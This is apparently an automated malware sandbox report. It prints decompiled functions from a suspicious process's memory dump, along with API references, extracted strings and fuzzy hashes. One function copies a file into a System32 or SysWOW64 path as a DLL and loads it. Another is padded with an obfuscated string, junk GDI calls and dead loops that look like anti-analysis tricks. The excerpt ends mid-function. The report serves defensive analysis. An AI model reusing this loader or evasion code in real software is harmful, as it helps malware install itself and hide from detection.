					_t58 = "\\";
					_push(_t58);
					_push(_t46);
					_push(_t58);
					_v8 = E00ECE9D2(_t21 + 0x1020);
					E00ED0299( &_v12);
					_push(0);
					_push(L"dll");
					_push(".");
					_push( &_v140);
					_t27 =  *0xef56a8; // 0xf00000
					_push(_t58);
					_t29 = E00ECE9D2(_t27 + 0x122a);
					 *0xef57a4 = _t29;
					CopyFileW(_v8, _t29, 0);
					_t31 = LoadLibraryW( *0xef57a4);
					 *0xef57a0 = _t31;
					if(_t31 == 0) {
						 *0xef5748 = 0;
					} else {
						_push(_t31);
						_push(0xee48c8);
						_t40 = 0x28;
						 *0xef5748 = E00ED04C4(_t40);
					}
					E00ECD1EA( &_v8, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					_t70 =  *0xef5748; // 0x0
					if(_t70 != 0) {
						goto L12;
					} else {
						E00ECD1EA(0xef57a4, 0xfffffffe);
						goto L10;
					}
				} else {
					L10:
					_t71 =  *0xef5748; // 0x0
					if(_t71 == 0) {
						_t39 =  *0xef56b4; // 0x520f7e8
						 *0xef5748 = _t39;
					}
					L12:
					return 1;
				}
			}

0x00ecd26b
0x00ecd26b
0x00ecd26e
0x00ecd273
0x00ecd288
0x00ecd29d
0x00ecd29e
0x00ecd2a4
0x00ecd2a9
0x00ecd2b6
0x00ecd2c7
0x00ecd2c8
0x00ecd2cf
0x00ecd2d6
0x00ecd2db
0x00ecd2e3
0x00ecd2ee
0x00ecd2f0
0x00ecd2f0
0x00ecd2f5
0x00ecd2f6
0x00ecd2f9
0x00ecd2fe
0x00ecd2ff
0x00ecd305
0x00ecd30c
0x00ecd313
0x00ecd318
0x00ecd319
0x00ecd31e
0x00ecd329
0x00ecd32a
0x00ecd334
0x00ecd336
0x00ecd343
0x00ecd348
0x00ecd354
0x00ecd35b
0x00ecd363
0x00ecd37c
0x00ecd365
0x00ecd365
0x00ecd366
0x00ecd36d
0x00ecd375
0x00ecd375
0x00ecd388
0x00ecd39a
0x00ecd3a2
0x00ecd3a8
0x00000000
0x00ecd3aa
0x00ecd3b1
0x00000000
0x00ecd3b7
0x00ecd3b8
0x00ecd3b8
0x00ecd3b8
0x00ecd3be
0x00ecd3c0
0x00ecd3c5
0x00ecd3c5
0x00ecd3ca
0x00ecd3cf
0x00ecd3cf

APIs

CopyFileW.KERNEL32(?,00000000,00000000), ref: 00ECD348
LoadLibraryW.KERNEL32 ref: 00ECD354
memset.MSVCRT ref: 00ECD39A

Strings

System32, xrefs: 00ECD2F0, 00ECD2FF
dll, xrefs: 00ECD319
%08x, xrefs: 00ECD2C8
SysWOW64, xrefs: 00ECD2E3

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CopyFileLibraryLoadmemset
String ID: %08x$SysWOW64$System32$dll
API String ID: 1089690609-3766923124
Opcode ID: 1fd1c62013ade2a3a982fa8a23ab7479a1ec966a87712d32637247b507d82daf
Instruction ID: 6437c48c10c96ecca147fee35d337a78caf829fd3f628328cdcefd82fabcc1f4
Opcode Fuzzy Hash: 1fd1c62013ade2a3a982fa8a23ab7479a1ec966a87712d32637247b507d82daf
Instruction Fuzzy Hash: 2E31E5B2A04608FFDB10AB69DD85FBA77E8EBA0314F11647EF305B61A1DA324945C711

Uniqueness

Uniqueness Score: -1.00%

Function 00EDEB0B, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

true, xrefs: 00EDEB5F
false, xrefs: 00EDEB6B
null, xrefs: 00EDEB53
%I64d, xrefs: 00EDEB7A

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %I64d$false$null$true
API String ID: 0-4285102228
Opcode ID: b072c9ec730dd7fd8b62524149843c96a5d87969f7a65cf08af70b516c2c860a
Instruction ID: ecfc3e8bb7277cfb63fe97ad08911458c214d7b6d7987288caeecf3499689111
Opcode Fuzzy Hash: b072c9ec730dd7fd8b62524149843c96a5d87969f7a65cf08af70b516c2c860a
Instruction Fuzzy Hash: D8D17471900209BADF21BF608C49FEF7BB9EF00354F106467FD16BA381E6719A529B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EC17CA, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00EC17CA(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v332;
				signed int _v336;
				intOrPtr _v340;
				short _v404;
				char _v405;
				char _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				void* __ebx;
				void* __esi;
				intOrPtr _t148;
				signed int _t153;
				signed int _t164;
				signed int _t172;
				signed int _t197;
				signed int _t204;
				signed int _t213;
				signed int _t215;
				void* _t219;
				void* _t221;
				void* _t222;
				void* _t235;
				signed int _t238;
				signed int _t246;
				void* _t251;
				signed int _t266;
				void* _t274;
				void* _t276;

				_t274 = __edi;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = E00EC24CE(__edx,  &_v20,  &_v32);
				if(0 != 0) {
					CancelDC(0);
				}
				if(_v28 != 0 || _v32 >= 0) {
					_v24 = E00ECEF54(0, _a4, E00ECFE78(_a4));
					_v16 = E00ECEF54(0, _a8, E00ECFE78(_a8));
					_t148 = E00ECFE78(_a8);
					_pop(_t235);
					_v36 = _t148;
					_v12 = E00EC168D(_t148, _t235, _v24, _v28, _v20);
					__eflags = _v12;
					if(_v12 >= 0) {
						_v16 = E00ECEF54(0, _a8, _v36);
						_t153 = _v12 * 0x18;
						_t238 = _v28;
						__eflags =  *((intOrPtr*)(_t238 + _t153 + 8)) - _v16;
						if( *((intOrPtr*)(_t238 + _t153 + 8)) != _v16) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t66 = 0xc + _v12 * 0x18; // 0xc
							E00ECD1EA(_v28 + _t66, 0);
							 *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) = E00ECD19C(_a8, _v36 + 1);
							_t164 = _v12 * 0x18;
							_t246 = _v28;
							__eflags =  *(_t246 + _t164 + 0xc);
							if( *(_t246 + _t164 + 0xc) != 0) {
								_v8 = 1;
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								L35:
								 *((intOrPtr*)(_v28 + 8 + _v12 * 0x18)) = _v16;
								 *((intOrPtr*)(_v28 + 0x10 + _v12 * 0x18)) = _v36;
								 *((intOrPtr*)(_v28 + 4 + _v12 * 0x18)) = 1;
								_t172 = E00EC1B45(_v36, __eflags, _v28, _v20);
								_pop(_t251);
								__eflags = _t172;
								if(_t172 >= 0) {
									_v40 = _v40 & 0x00000000;
									_v40 = E00EC111F(_t172, _t251, _v24);
									__imp__GetCPInfoExA(0x60, 0x1d,  &_v332);
									_v336 = GetLastError();
									_v340 = E00ECFE78("X fUEXFoAxQcYLF DehorK6LqxG3C3qEjhrIwwJi44PlMaTln3n7NnpSEG7TEG WtLUByY5Ohe7xLDhcZV7AoWHpeTZqyprzFfKvjPQCXAdoQoAtIWR,Xpmr8C4h1YEFqTu iZTT69 phiysQUSbqXaiynVCosCweo1.JdG9pnLvECZDVT3XNZtp.wU h.h4sYBCVyo535c5QghMkjhcrOgx55F3MrDECpY2v,32cxASIPfyhh3d0ZYVG2eja,.iDq629cvdbbH2OFTg KLYXEMGLCxqIr5RBJ7N4hCBORf5gpvWxL03Ji7JQ6zdi53ntss5W.V7BbKj0p xB9 y7sYdG5aGnmhapIHPYTe.,OHNWeZmI,KeG0w,gk6,QA0r3VyZGkkDe5H7Pe.BrBiirB7fDnNhYflO Hv0.yGw8zZkhRLGjj6Ha92jCbDY0lSdThgtsdoPP5oO.U8X Njjg.zpN4OEBLq AUa  eS,8tlPFNs94qQAtb5F7n JdUBSKAlE7XKhvAu5S2641.9plGPt,q7vq64I74DIzw20l58wvVZ 3ZBS.5Cd3m5sT9b4uppAAVULfN 8y7pbMvc");
									__eflags = _v340 - 0xf;
									if(_v340 <= 0xf) {
										_v428 = _v340;
									} else {
										_v428 = 0xf;
									}
									_v424 = _v428;
									_v405 = 0;
									_v336 = _v336 & 0x00000000;
									while(1) {
										__eflags = _v336 - _v424;
										if(_v336 >= _v424) {
											break;
										}
										 *((char*)(_t276 + _v336 - 0x1a0)) = _v336 + 0x42;
										MultiByteToWideChar(0, 0,  &_v420, 0xffffffff,  &_v404, 0x20);
										_t197 = _v336 + 1;
										__eflags = _t197;
										_v336 = _t197;
									}
									__eflags = _v40;
									if(_v40 >= 0) {
										E00EC2192(_v40);
									}
									__eflags = _v12 * 0x18;
									E00EC135A(_t274,  *((intOrPtr*)(_v28 + _v12 * 0x18)),  *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)),  *((intOrPtr*)(_v28 + 0x10 + _v12 * 0x18)), 0);
									L47:
									E00EC1000( &_v28, _v20);
									return _v8;
								}
								_v8 = 0xfffffff9;
								goto L47;
							} else {
								goto L29;
							}
							while(1) {
								L29:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v8 = 0xfffffffb;
							goto L47;
						} else {
							goto L23;
						}
						while(1) {
							L23:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L47;
					}
					__eflags = _a12 & 0x00000002;
					if((_a12 & 0x00000002) == 0) {
						_t204 = E00ECD07F((_v20 + 1) * 0x18,  &_v28, _v20 * 0x18);
						__eflags = _t204;
						if(_t204 != 0) {
							_v12 = _v20;
							_v20 = _v20 + 1;
							 *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) = E00ECD19C(_a8, _v36 + 1);
							IsValidCodePage(0x26);
							_t213 = _v12 * 0x18;
							_t266 = _v28;
							__eflags =  *(_t266 + _t213 + 0xc);
							if( *(_t266 + _t213 + 0xc) != 0) {
								_t215 = _v12 * 0x18;
								__eflags = _t215;
								 *((intOrPtr*)(_v28 + _t215)) = _v24;
								_v8 = 1;
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								goto L35;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v8 = 0xfffffffc;
							goto L47;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t219 = 0xfffffffd;
						return _t219;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t221 = 0xffffffec;
					return _t221;
				} else {
					_t222 = 0xfffffff8;
					return _t222;
				}
			}

0x00ec17ca
0x00ec17d5
0x00ec17d9
0x00ec17dd
0x00ec17e1
0x00ec17e5
0x00ec17f8
0x00ec17fd
0x00ec1801
0x00ec1801
0x00ec180b
0x00ec1831
0x00ec184a
0x00ec1850
0x00ec1855
0x00ec1856
0x00ec186a
0x00ec186d
0x00ec1871
0x00ec193e
0x00ec1944
0x00ec1947
0x00ec194e
0x00ec1951
0x00ec1967
0x00ec1967
0x00ec1969
0x00000000
0x00000000
0x00ec196b
0x00ec1978
0x00ec197d
0x00ec199c
0x00ec19a3
0x00ec19a6
0x00ec19a9
0x00ec19ae
0x00ec19c7
0x00ec19ce
0x00ec19ce
0x00ec19d0
0x00000000
0x00000000
0x00ec19d2
0x00ec19d4
0x00ec19e0
0x00ec19f0
0x00ec19fd
0x00ec1a0b
0x00ec1a11
0x00ec1a12
0x00ec1a14
0x00ec1a27
0x00ec1a34
0x00ec1a42
0x00ec1a4e
0x00ec1a5f
0x00ec1a65
0x00ec1a6c
0x00ec1a80
0x00ec1a6e
0x00ec1a6e
0x00ec1a6e
0x00ec1a8c
0x00ec1a92
0x00ec1a99
0x00ec1aaf
0x00ec1ab5
0x00ec1abb
0x00000000
0x00000000
0x00ec1acc
0x00ec1ae9
0x00ec1aa8
0x00ec1aa8
0x00ec1aa9
0x00ec1aa9
0x00ec1af1
0x00ec1af5
0x00ec1afa
0x00ec1aff
0x00ec1b1f
0x00ec1b28
0x00ec1b30
0x00ec1b37
0x00000000
0x00ec1b3e
0x00ec1a16
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec19b0
0x00ec19b0
0x00ec19b0
0x00ec19b2
0x00000000
0x00000000
0x00ec19b4
0x00ec19b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec1953
0x00ec1953
0x00ec1953
0x00ec1955
0x00000000
0x00000000
0x00ec1957
0x00ec1959
0x00000000
0x00ec1959
0x00ec187a
0x00ec187d
0x00ec189e
0x00ec18a4
0x00ec18a6
0x00ec18b9
0x00ec18c0
0x00ec18db
0x00ec18e1
0x00ec18ea
0x00ec18ed
0x00ec18f0
0x00ec18f5
0x00ec1911
0x00ec1911
0x00ec191a
0x00ec191d
0x00ec1924
0x00ec1924
0x00ec1926
0x00000000
0x00000000
0x00ec1928
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec18f7
0x00ec18f7
0x00ec18f7
0x00ec18f9
0x00000000
0x00000000
0x00ec18fb
0x00ec18fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec18a8
0x00ec18a8
0x00ec18a8
0x00ec18aa
0x00000000
0x00000000
0x00ec18ac
0x00ec18b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec187f
0x00ec187f
0x00ec187f
0x00ec1881
0x00000000
0x00000000
0x00ec1883
0x00ec1887
0x00000000
0x00ec1813
0x00ec1815
0x00000000
0x00ec1815

APIs

Part of subcall function 00EC24CE: Arc.GDI32(00000000,0000000C,0000005B,00000039,00000057,00000002,00000058,00000022,00000018), ref: 00EC2757
Part of subcall function 00EC24CE: CancelDC.GDI32(00000000), ref: 00EC2770

CancelDC.GDI32(00000000), ref: 00EC1801
IsValidCodePage.KERNEL32(00000026), ref: 00EC18E1

Strings

X fUEXFoAxQcYLF DehorK6LqxG3C3qEjhrIwwJi44PlMaTln3n7NnpSEG7TEG WtLUByY5Ohe7xLDhcZV7AoWHpeTZqyprzFfKvjPQCXAdoQoAtIWR,Xpmr8C4h1YEFqTu iZTT69 phiysQUSbqXaiynVCosCweo1.JdG9pnLvECZDVT3XNZtp.wU h.h4sYBCVyo535c5QghMkjhcrOgx55F3MrDECpY2v,32cxASIPfyhh3d0ZYVG2eja,.iDq62, xrefs: 00EC1A54

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Cancel$CodePageValid
String ID: X fUEXFoAxQcYLF DehorK6LqxG3C3qEjhrIwwJi44PlMaTln3n7NnpSEG7TEG WtLUByY5Ohe7xLDhcZV7AoWHpeTZqyprzFfKvjPQCXAdoQoAtIWR,Xpmr8C4h1YEFqTu iZTT69 phiysQUSbqXaiynVCosCweo1.JdG9pnLvECZDVT3XNZtp.wU h.h4sYBCVyo535c5QghMkjhcrOgx55F3MrDECpY2v,32cxASIPfyhh3d0ZYVG2eja,.iDq62
API String ID: 435500438-3983579876
Opcode ID: f98251ed7e1ae7e3f24d75e67bb21f6ed8c7c3c4b68f756d90385e34e788f621
Instruction ID: 12f1bb5398b4bf1e7742b04845d02f4459c71e21a758270286c71f1b22d680bd
Opcode Fuzzy Hash: f98251ed7e1ae7e3f24d75e67bb21f6ed8c7c3c4b68f756d90385e34e788f621
Instruction Fuzzy Hash: 81B14D31904209DFDF14CB94DA45FEDBBF5EB06324F20519EE415BA292DB329A82DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EDDD66, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00EDDD66(void* __ebx, intOrPtr __edx, void* __eflags, void* __fp0) {
				char _v8;
				long long _v16;
				void* __esi;
				void* _t51;
				intOrPtr _t56;
				void* _t62;
				signed int _t71;
				void* _t74;
				void* _t76;
				signed int _t82;
				signed int* _t90;
				intOrPtr* _t91;
				void* _t96;
				intOrPtr _t119;
				signed int _t122;
				signed int _t123;
				intOrPtr _t128;
				signed int _t131;
				intOrPtr* _t139;
				void* _t152;

				_t152 = __fp0;
				_t119 = __edx;
				_t96 = __ebx;
				_t51 = E00EDF1F5(__ebx + 0x28);
				if( *((intOrPtr*)(__ebx + 0x3c)) == 0x100) {
					E00EDF0C2(_t51,  *(__ebx + 0x40));
					 *(__ebx + 0x40) =  *(__ebx + 0x40) & 0x00000000;
					 *(__ebx + 0x44) =  *(__ebx + 0x44) & 0x00000000;
				}
				_push(_t122);
				do {
					_t131 = E00EDD9F7(_t96);
				} while (_t131 == 0x20 || _t131 == 9 || _t131 == 0xa || _t131 == 0xd);
				_t123 = _t122 | 0xffffffff;
				if(_t131 != _t123) {
					__eflags = _t131 - 0xfffffffe;
					if(_t131 != 0xfffffffe) {
						E00EDF226(_t96 + 0x28, _t131);
						__eflags = _t131 - 0x7b;
						if(_t131 == 0x7b) {
							L67:
							 *(_t96 + 0x3c) = _t131;
							goto L68;
						}
						__eflags = _t131 - 0x7d;
						if(_t131 == 0x7d) {
							goto L67;
						}
						__eflags = _t131 - 0x5b;
						if(_t131 == 0x5b) {
							goto L67;
						}
						__eflags = _t131 - 0x5d;
						if(_t131 == 0x5d) {
							goto L67;
						}
						__eflags = _t131 - 0x3a;
						if(_t131 == 0x3a) {
							goto L67;
						}
						__eflags = _t131 - 0x2c;
						if(_t131 == 0x2c) {
							goto L67;
						}
						__eflags = _t131 - 0x22;
						if(__eflags != 0) {
							__eflags = _t131 - 0x30;
							if(_t131 < 0x30) {
								L21:
								__eflags = _t131 - 0x2d;
								if(_t131 != 0x2d) {
									__eflags = _t131 - 0x41;
									if(_t131 < 0x41) {
										L54:
										__eflags = _t131 + 0xffffff9f - 0x19;
										if(__eflags > 0) {
											while(1) {
												_t56 =  *((intOrPtr*)(_t96 + 0x10));
												__eflags =  *((char*)(_t56 + _t96 + 8));
												if( *((char*)(_t56 + _t96 + 8)) == 0) {
													break;
												}
												E00EDF226(_t96 + 0x28,  *( *((intOrPtr*)(_t96 + 0x10)) + _t96 + 8) & 0x000000ff);
												 *((intOrPtr*)(_t96 + 0x10)) =  *((intOrPtr*)(_t96 + 0x10)) + 1;
												_t43 = _t96 + 0x24;
												 *_t43 =  *(_t96 + 0x24) + 1;
												__eflags =  *_t43;
											}
											goto L10;
										} else {
											goto L55;
										}
										do {
											while(1) {
												L55:
												_t62 = E00EDDB0A(_t96, __eflags);
												__eflags = _t62 - 0x41;
												if(_t62 < 0x41) {
													break;
												}
												__eflags = _t62 - 0x5a;
												if(__eflags <= 0) {
													continue;
												}
												break;
											}
											__eflags = _t62 - 0x61;
											if(_t62 < 0x61) {
												break;
											}
											__eflags = _t62 - 0x7a;
										} while (__eflags <= 0);
										E00EDDAEC(_t62, _t96);
										E00EDF108(_t96 + 0x28);
										_push(5);
										__eflags = 0;
										asm("repe cmpsb");
										if(0 != 0) {
											_push(6);
											__eflags = 0;
											asm("repe cmpsb");
											if(0 != 0) {
												_push(5);
												asm("repe cmpsb");
												 *(_t96 + 0x3c) = 0x103;
											} else {
												 *(_t96 + 0x3c) = 0x104;
											}
										} else {
											 *(_t96 + 0x3c) = 0x103;
										}
										goto L68;
									}
									__eflags = _t131 - 0x5a;
									if(__eflags <= 0) {
										goto L55;
									}
									goto L54;
								}
								L22:
								_t71 = _t131;
								 *(_t96 + 0x3c) = _t123;
								__eflags = _t131 - 0x2d;
								if(__eflags == 0) {
									_t71 = E00EDDB0A(_t96, __eflags);
								}
								__eflags = _t71 - 0x30;
								if(__eflags != 0) {
									_t14 = _t71 - 0x30; // -48
									__eflags = _t14 - 9;
									if(__eflags > 0) {
										goto L26;
									} else {
										goto L28;
									}
									while(1) {
										L28:
										_t74 = E00EDDB0A(_t96, __eflags);
										__eflags = _t74 - 0x30;
										if(_t74 < 0x30) {
											goto L30;
										}
										__eflags = _t74 - 0x39;
										if(__eflags <= 0) {
											continue;
										}
										goto L30;
									}
									goto L30;
								} else {
									_t74 = E00EDDB0A(_t96, __eflags);
									_t13 = _t74 - 0x30; // -48
									__eflags = _t13 - 9;
									if(_t13 > 9) {
										L30:
										__eflags =  *(_t96 + 0x34) & 0x00000008;
										if(( *(_t96 + 0x34) & 0x00000008) != 0) {
											L36:
											__eflags = _t74 - 0x2e;
											if(_t74 != 0x2e) {
												L41:
												__eflags = _t74 - 0x45;
												if(__eflags == 0) {
													L43:
													_t76 = E00EDDB0A(_t96, __eflags);
													__eflags = _t76 - 0x2b;
													if(__eflags == 0) {
														L45:
														_t71 = E00EDDB0A(_t96, __eflags);
														L46:
														_t25 = _t71 - 0x30; // -48
														__eflags = _t25 - 9;
														if(__eflags > 0) {
															goto L26;
														} else {
															goto L47;
														}
														while(1) {
															L47:
															_t74 = E00EDDB0A(_t96, __eflags);
															__eflags = _t74 - 0x30;
															if(_t74 < 0x30) {
																break;
															}
															__eflags = _t74 - 0x39;
															if(__eflags <= 0) {
																continue;
															}
															break;
														}
														L49:
														E00EDDAEC(_t74, _t96);
														_t82 = E00EDF590(_t96 + 0x28, _t152, _t96 + 0x28,  &_v16);
														__eflags = _t82;
														if(_t82 == 0) {
															 *(_t96 + 0x3c) = 0x102;
															 *((long long*)(_t96 + 0x40)) = _v16;
														}
														goto L68;
													}
													__eflags = _t76 - 0x2d;
													if(__eflags != 0) {
														goto L46;
													}
													goto L45;
												}
												__eflags = _t74 - 0x65;
												if(__eflags != 0) {
													goto L49;
												}
												goto L43;
											}
											L37:
											_t137 = _t96;
											_t23 = E00EDD9F7(_t96) - 0x30; // -48
											__eflags = _t23 - 9;
											if(__eflags > 0) {
												E00EDDABD(_t83, _t137);
												goto L68;
											}
											E00EDF226(_t96 + 0x28, _t83);
											while(1) {
												_t74 = E00EDDB0A(_t96, __eflags);
												__eflags = _t74 - 0x30;
												if(_t74 < 0x30) {
													goto L41;
												}
												__eflags = _t74 - 0x39;
												if(__eflags <= 0) {
													continue;
												}
												goto L41;
											}
											goto L41;
										}
										__eflags = _t74 - 0x2e;
										if(_t74 == 0x2e) {
											goto L37;
										}
										__eflags = _t74 - 0x45;
										if(_t74 == 0x45) {
											goto L36;
										}
										__eflags = _t74 - 0x65;
										if(_t74 == 0x65) {
											goto L36;
										}
										E00EDDAEC(_t74, _t96);
										_t90 = E00EDF108(_t96 + 0x28);
										L00EDFD34();
										 *_t90 =  *_t90 & 0x00000000;
										_push(0xa);
										_t91 =  &_v8;
										_push(_t91);
										_push(_t90);
										L00EDFD2E();
										_t139 = _t91;
										_t128 = _t119;
										L00EDFD34();
										__eflags =  *_t91 - 0x22;
										if( *_t91 != 0x22) {
											 *(_t96 + 0x3c) = 0x101;
											 *((intOrPtr*)(_t96 + 0x40)) = _t139;
											 *((intOrPtr*)(_t96 + 0x44)) = _t128;
										}
										goto L68;
									}
									L26:
									E00EDDAEC(_t71, _t96);
									goto L68;
								}
							}
							__eflags = _t131 - 0x39;
							if(_t131 <= 0x39) {
								goto L22;
							}
							goto L21;
						} else {
							E00EDDB74(_t96, __eflags);
							goto L68;
						}
					}
					L10:
					 *(_t96 + 0x3c) = _t123;
					goto L68;
				} else {
					 *(_t96 + 0x3c) =  *(_t96 + 0x3c) & 0x00000000;
					L68:
					return  *(_t96 + 0x3c);
				}
			}

0x00eddd66
0x00eddd66
0x00eddd66
0x00eddd70
0x00eddd7d
0x00eddd82
0x00eddd87
0x00eddd8b
0x00eddd8f
0x00eddd91
0x00eddd92
0x00eddd99
0x00eddd9b
0x00edddaf
0x00edddb4
0x00edddbf
0x00edddc2
0x00edddd1
0x00edddd8
0x00eddddb
0x00ede046
0x00ede046
0x00000000
0x00ede046
0x00eddde1
0x00eddde4
0x00000000
0x00000000
0x00edddea
0x00eddded
0x00000000
0x00000000
0x00edddf3
0x00edddf6
0x00000000
0x00000000
0x00edddfc
0x00edddff
0x00000000
0x00000000
0x00edde05
0x00edde08
0x00000000
0x00000000
0x00edde0e
0x00edde11
0x00edde1f
0x00edde22
0x00edde29
0x00edde29
0x00edde2c
0x00eddf8c
0x00eddf8f
0x00eddf96
0x00eddf99
0x00eddf9c
0x00ede037
0x00ede037
0x00ede03a
0x00ede03f
0x00000000
0x00000000
0x00ede02a
0x00ede02f
0x00ede032
0x00ede032
0x00ede032
0x00ede036
0x00000000
0x00000000
0x00000000
0x00000000
0x00eddfa2
0x00eddfa2
0x00eddfa2
0x00eddfa4
0x00eddfa9
0x00eddfac
0x00000000
0x00000000
0x00eddfae
0x00eddfb1
0x00000000
0x00000000
0x00000000
0x00eddfb1
0x00eddfb3
0x00eddfb6
0x00000000
0x00000000
0x00eddfb8
0x00eddfb8
0x00eddfbf
0x00eddfc8
0x00eddfce
0x00eddfd8
0x00eddfda
0x00eddfdc
0x00eddfe7
0x00eddff1
0x00eddff3
0x00eddff5
0x00ede004
0x00ede00c
0x00ede018
0x00eddff7
0x00eddff7
0x00eddff7
0x00eddfde
0x00eddfde
0x00eddfde
0x00000000
0x00eddfdc
0x00eddf91
0x00eddf94
0x00000000
0x00000000
0x00000000
0x00eddf94
0x00edde32
0x00edde32
0x00edde34
0x00edde37
0x00edde3a
0x00edde3e
0x00edde3e
0x00edde43
0x00edde46
0x00edde63
0x00edde66
0x00edde69
0x00000000
0x00000000
0x00000000
0x00000000
0x00edde6b
0x00edde6b
0x00edde6d
0x00edde72
0x00edde75
0x00000000
0x00000000
0x00edde77
0x00edde7a
0x00000000
0x00000000
0x00000000
0x00edde7a
0x00000000
0x00edde48
0x00edde4a
0x00edde4f
0x00edde52
0x00edde55
0x00edde7c
0x00edde7c
0x00edde80
0x00eddede
0x00eddede
0x00eddee1
0x00eddf13
0x00eddf13
0x00eddf16
0x00eddf1d
0x00eddf1f
0x00eddf24
0x00eddf27
0x00eddf2e
0x00eddf30
0x00eddf35
0x00eddf35
0x00eddf38
0x00eddf3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00eddf41
0x00eddf41
0x00eddf43
0x00eddf48
0x00eddf4b
0x00000000
0x00000000
0x00eddf4d
0x00eddf50
0x00000000
0x00000000
0x00000000
0x00eddf50
0x00eddf52
0x00eddf54
0x00eddf61
0x00eddf68
0x00eddf6a
0x00eddf73
0x00eddf7a
0x00eddf7a
0x00000000
0x00eddf6a
0x00eddf29
0x00eddf2c
0x00000000
0x00000000
0x00000000
0x00eddf2c
0x00eddf18
0x00eddf1b
0x00000000
0x00000000
0x00000000
0x00eddf1b
0x00eddee3
0x00eddee3
0x00eddeea
0x00eddeed
0x00eddef0
0x00eddf82
0x00000000
0x00eddf82
0x00eddefb
0x00eddf02
0x00eddf04
0x00eddf09
0x00eddf0c
0x00000000
0x00000000
0x00eddf0e
0x00eddf11
0x00000000
0x00000000
0x00000000
0x00eddf11
0x00000000
0x00eddf02
0x00edde82
0x00edde85
0x00000000
0x00000000
0x00edde87
0x00edde8a
0x00000000
0x00000000
0x00edde8c
0x00edde8f
0x00000000
0x00000000
0x00edde93
0x00edde9c
0x00eddea3
0x00eddea8
0x00eddeab
0x00eddead
0x00eddeb0
0x00eddeb1
0x00eddeb2
0x00eddeba
0x00eddebc
0x00eddebe
0x00eddec3
0x00eddec6
0x00eddecc
0x00edded3
0x00edded6
0x00edded6
0x00000000
0x00eddec6
0x00edde57
0x00edde59
0x00000000
0x00edde59
0x00edde46
0x00edde24
0x00edde27
0x00000000
0x00000000
0x00000000
0x00edde13
0x00edde15
0x00000000
0x00edde15
0x00edde11
0x00edddc4
0x00edddc4
0x00000000
0x00edddb6
0x00edddb6
0x00ede049
0x00ede04f
0x00ede04f

Strings

true, xrefs: 00EDDFD0
false, xrefs: 00EDDFE9
null, xrefs: 00EDE006

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: false$null$true
API String ID: 0-2913297407
Opcode ID: 3eb1e079ff5c886ab8c4902fcdc7d85cfc621a5886416cbc3b95303d49c43675
Instruction ID: 5db562feab13e508bf6c3e2c9221b2614ac833327f322d789f2f4769c0c70e64
Opcode Fuzzy Hash: 3eb1e079ff5c886ab8c4902fcdc7d85cfc621a5886416cbc3b95303d49c43675
Instruction Fuzzy Hash: 1571B772D082004ACF38BF289DC96A82799DB55318B653967EC12FF396D6B8CC87C741

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4E97, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00EC4E97(intOrPtr* _a4) {
				char _v132;
				char _v220;
				int _v224;
				char _v228;
				short _v232;
				char _v233;
				char _v236;
				char _v240;
				int _v244;
				char _v248;
				char _v252;
				int _v260;
				intOrPtr _v272;
				intOrPtr _v280;
				char _v284;
				char _v288;
				char _v292;
				int _v296;
				void* __edi;
				void* __esi;
				intOrPtr _t69;
				char _t74;
				char _t77;
				intOrPtr _t87;
				void* _t89;
				void* _t100;
				char _t102;
				void* _t107;
				char* _t110;
				void* _t113;
				short _t119;
				void* _t123;
				intOrPtr _t124;
				void* _t125;
				void* _t142;
				char _t143;
				char _t144;
				signed int _t150;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;

				_t152 = (_t150 & 0xfffffff8) - 0x104;
				_t121 = _a4;
				_t68 =  *_a4;
				_v224 = 0;
				_v260 = 0;
				_v236 = 0;
